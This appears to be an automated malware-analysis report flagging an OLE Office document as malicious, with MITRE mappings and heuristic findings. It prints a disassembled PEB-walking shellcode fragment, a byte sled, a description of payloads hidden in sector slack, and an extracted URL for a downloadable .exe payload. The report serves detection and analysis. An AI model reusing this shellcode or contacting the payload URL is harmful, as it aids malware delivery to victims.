Verdict: MALICIOUS
Risk Score: 102
Malware Insights
MITRE ATT&CK
T1027 Obfuscated Files or Information
T1497 Virtualization/Sandbox Evasion
The sample exhibits characteristics of a packed executable, including a large amount of slack space and PEB access, which are common evasion techniques. The embedded URL likely points to a secondary payload, such as an executable, which is a typical distribution method for malware.
Heuristics (4)
- PEB access via FS segment (x86) (severity: high, SC_PEB_ACCESS)
  PEB access via FS segment (x86)
  Disassembly (attempted x86 opcode disassembly):
  00000991 648b4030       mov eax, dword ptr fs:[eax + 0x30]
  00000995 8b400c         mov eax, dword ptr [eax + 0xc]
  00000998 8b401c         mov eax, dword ptr [eax + 0x1c]
  0000099B 8b7008         mov esi, dword ptr [eax + 8]
  0000099E 8b7820         mov edi, dword ptr [eax + 0x20]
  000009A1 8b00           mov eax, dword ptr [eax]
  000009A3 66837f1800     cmp word ptr [edi + 0x18], 0
  000009A8 75f1           jne 0x99b
  000009AA 81ec00000000   sub esp, 0
  000009B0 89e7           mov edi, esp
  000009B2 c7073274910c   mov dword ptr [edi], 0xc917432
  000009B8 c7470439e27d83 mov dword ptr [edi + 4], 0x837de239
  000009BF c747086389d14f mov dword ptr [edi + 8], 0x4fd18963
  000009C6 c7470c80d6af9a mov dword ptr [edi + 0xc], 0x9aafd680
  000009CD c7471058cb3b21 mov dword ptr [edi + 0x10], 0x213bcb58
  000009D4 6a03           push 3
  000009D6 58             pop eax
  000009D7 89fb           mov ebx, edi
  000009D9 895750         mov dword ptr [edi + 0x50], edx
  000009DC e835ffffff     call 0x916
  000009E1 48             dec eax
  000009E2 75f8           jne 0x9dc
  000009E4 89df           mov edi, ebx
  000009E6 686c6c0000     push 0x6c6c
  000009EB 686f6e2e64     push 0x642e6e6f
  000009F0 68             .byte 0x68
- OLE document has large unaccounted-for region (severity: high, OLE_SLACK_ANOMALY)
  OLE file is 2,097,098 bytes but its declared streams total only 228 bytes; 2,096,870 bytes (100%) live in unallocated sector slack. This is the canonical hiding place for pre-macro-era Office exploit payloads (XOR-encoded shellcode reached via a parser pointer-corruption bug in the document structure).
- NOP-equivalent sled detected (severity: medium, SC_NOP_EQUIV_SLED)
  Long run of 0x41 bytes
  Disassembly (attempted x86 opcode disassembly):
  0000088C 41             inc ecx
  0000088D 41             inc ecx
  0000088E 41             inc ecx
  ...                     (the same single-byte instruction, 41 inc ecx, repeats at every address through 000008EB: 96 instructions in total)
  000008EA 41             inc ecx
  000008EB 41             inc ecx
- Embedded URL (severity: info, EMBEDDED_URL)
  One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  URL: http://a.pomf.hummingbird.moe/kampdj.exe (in document text, OLE body)